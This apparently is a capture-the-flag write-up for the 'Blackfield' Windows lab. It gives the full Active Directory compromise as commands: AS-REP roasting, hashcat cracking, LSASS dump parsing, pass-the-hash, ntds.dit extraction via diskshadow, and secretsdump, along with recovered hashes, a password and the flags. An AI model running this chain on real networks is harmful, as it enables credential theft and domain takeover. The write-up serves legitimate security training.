Difficulty: Hard (Windows)
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local)
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0
Service Info: Host: DC01; OS: Windows
Ports 53, 88 and 389 (DNS, Kerberos and LDAP side by side) identify a Windows Domain Controller running Active Directory; 445 (SMB) is the usual file-share entry point. Port 5985 exposes WinRM for remote management. The domain name BLACKFIELD.local and the hostname DC01 come from the LDAP banner and the Nmap service info.
smbclient //10.129.8.195/profiles$ -U ''
An anonymous (null session) connection to the profiles$ share reveals over 300 directories, each corresponding to a domain user account. These names are harvested into users.txt for targeted enumeration.
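The writeup does not show how the listing becomes users.txt. The following bash snippet is an added example (not part of the original writeup): it takes an smbclient `ls` listing on stdin and keeps only directory entries, dropping `.` and `..`. The listing embedded below is constructed sample data in smbclient's output format, not the real share contents; the IP in the usage comment is the one from the writeup.

```bash
#!/usr/bin/env bash
# Added example, not from the original writeup.
# Turn an smbclient directory listing of profiles$ into a one-name-per-line
# user list suitable for GetNPUsers.py -userfile.
set -euo pipefail

# Constructed sample in smbclient `ls` format: name, attribute flags
# (D = directory, A = archive, H = hidden, S = system), size, timestamp.
SAMPLE_LISTING='  .                                   D        0  Wed Jun  3 16:47:12 2020
  ..                                  D        0  Wed Jun  3 16:47:12 2020
  AAlleni                             D        0  Wed Jun  3 16:47:11 2020
  ABarteski                           D        0  Wed Jun  3 16:47:11 2020
  $RECYCLE.BIN                        DHS      0  Wed Jun  3 16:47:11 2020
  support                             D        0  Wed Jun  3 16:47:11 2020
  README.txt                          A      123  Wed Jun  3 16:47:11 2020

                6283273 blocks of size 4096. 1551741 blocks available'

# harvest_users: read an smbclient listing on stdin, print unique directory
# names. Only directories carry the D flag, so the attribute column decides.
# Assumes profile directory names contain no spaces (true for sAMAccountNames).
# Names starting with $ (e.g. $RECYCLE.BIN) are share housekeeping, not users.
harvest_users() {
  awk '$2 ~ /D/ && $1 != "." && $1 != ".." && $1 !~ /^\$/ { print $1 }' \
    | LC_ALL=C sort -u
}

# count_users: convenience wrapper, useful as a sanity check (the writeup
# reports over 300 entries on the real share).
count_users() {
  harvest_users | wc -l | tr -d ' '
}

# Live usage (assumes the target IP from the writeup; -N suppresses the
# password prompt for the null session):
#   smbclient -N '//10.129.8.195/profiles$' -c ls | harvest_users > users.txt
# Offline run against the constructed listing:
printf '%s\n' "$SAMPLE_LISTING" | harvest_users
```

Feeding the real listing through the same pipeline yields users.txt; a quick `wc -l` against the directory count reported by smbclient catches truncated transfers before the AS-REP roasting step.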
AS-REP Roasting targets accounts with Kerberos pre-authentication disabled (DONT_REQ_PREAUTH). Using the harvested users.txt list:
GetNPUsers.py BLACKFIELD.local/ -userfile users.txt -format hashcat -dc-ip 10.129.8.195
The account support is found to be vulnerable, returning a crackable AS-REP hash.
hashcat -m 18200 support.hash /usr/share/wordlists/rockyou.txt
Result: support : #00^BlackKnight
Authenticating to SMB with the support credentials reveals access to the forensic share. Inside \memory_analysis\, an LSASS process dump archive is discovered:
smbclient //10.129.8.195/forensic -U 'support%#00^BlackKnight'
smb: \memory_analysis\> get lsass.zip
The archive is unpacked and the contained lsass.DMP is parsed locally with pypykatz to extract credential material:
pypykatz lsa minidump lsass.DMP
Multiple NT hashes are recovered, including two high-value accounts:
svc_backup: 9658d1d1dcd9250115e2205d9f48400d
Administrator: 7f1e4ff8c6a8e6b6fcae2d9c0572cd62 (account disabled for direct login)
Using the svc_backup NT hash, we authenticate via Evil-WinRM using Pass-the-Hash (PtH):
evil-winrm -i 10.129.8.195 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
Checking privileges reveals SeBackupPrivilege and SeRestorePrivilege:
whoami /priv
These privileges allow reading any file on the system, bypassing NTFS ACLs entirely. The objective is to extract the Active Directory database, ntds.dit. Because the file is locked by the system, Volume Shadow Copy (VSS) is leveraged through diskshadow.
diskshadow.txt:
set context persistent nowriters
add volume c: alias scripta
create
expose %scripta% z:
Execution and extraction:
diskshadow /s diskshadow.txt
robocopy /b Z:\Windows\NTDS\ C:\Temp\ ntds.dit
reg save hklm\system C:\Temp\system.bak
Note: robocopy /b uses backup semantics (FILE_FLAG_BACKUP_SEMANTICS), which relies on SeBackupPrivilege to bypass ACL restrictions, so no shell tricks are required. If diskshadow.txt is written on the attack machine, convert it to Windows (CRLF) line endings, for example with unix2dos, before uploading it; diskshadow expects CRLF-terminated script lines.
After downloading both files to the attack machine, all domain hashes are extracted with secretsdump.py. The SYSTEM hive is required because it holds the boot key that unlocks the Password Encryption Key (PEK) protecting the secrets inside ntds.dit:
impacket-secretsdump -ntds ntds.dit -system system.bak LOCAL
Result: Administrator:500:aad3...:184fb5e5178480be64824d4cd53b99ee
Login via Pass-the-Hash as Domain Administrator:
evil-winrm -i 10.129.8.195 -u administrator -H 184fb5e5178480be64824d4cd53b99ee
| Flag | Hash |
|---|---|
| User | 3920bb317a0bef51027e2852be64b543 |
| Root | 4375a629c7c67c8e29db269060c955cb |
Nmap → Domain Controller (BLACKFIELD.local) on standard AD ports
→ Anonymous SMB on profiles$ (User Enumeration)
→ AS-REP Roasting (support) → Cracked Password (#00^BlackKnight)
→ SMB access to forensic share → Found lsass.zip (Memory Dump)
→ Extracted svc_backup NT Hash via pypykatz
→ WinRM (PtH as svc_backup) → SeBackupPrivilege Abuse (Diskshadow + Robocopy)
→ Extracted ntds.dit → Dumped Domain Admin Hash → WinRM (PtH as Admin) → Root